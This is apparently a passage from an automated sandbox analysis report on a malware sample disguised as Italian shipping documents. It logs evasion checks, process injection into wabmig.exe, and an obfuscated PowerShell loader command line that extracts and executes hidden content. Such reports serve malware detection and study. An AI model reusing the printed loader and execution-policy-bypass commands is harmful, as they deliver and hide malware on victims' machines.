            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -594718s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -594600s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -594484s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -594375s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599779Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599545Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599435Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598869Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598761Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598640Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598419Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598185Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598075Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597733Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597622Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597044Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596315Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596076Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595624Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595270Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595154Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595042Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594600Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594375Jump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\userJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: wabmig.exe, 0000000B.00000002.2999110092.0000000008877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPm
            Source: wabmig.exe, 0000000B.00000002.2999110092.00000000088D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Documenti di spedizione 0009333000459595995.exe, 00000005.00000002.1793128293.0000000000840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 4460000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 2EFFBE4Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)Jump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
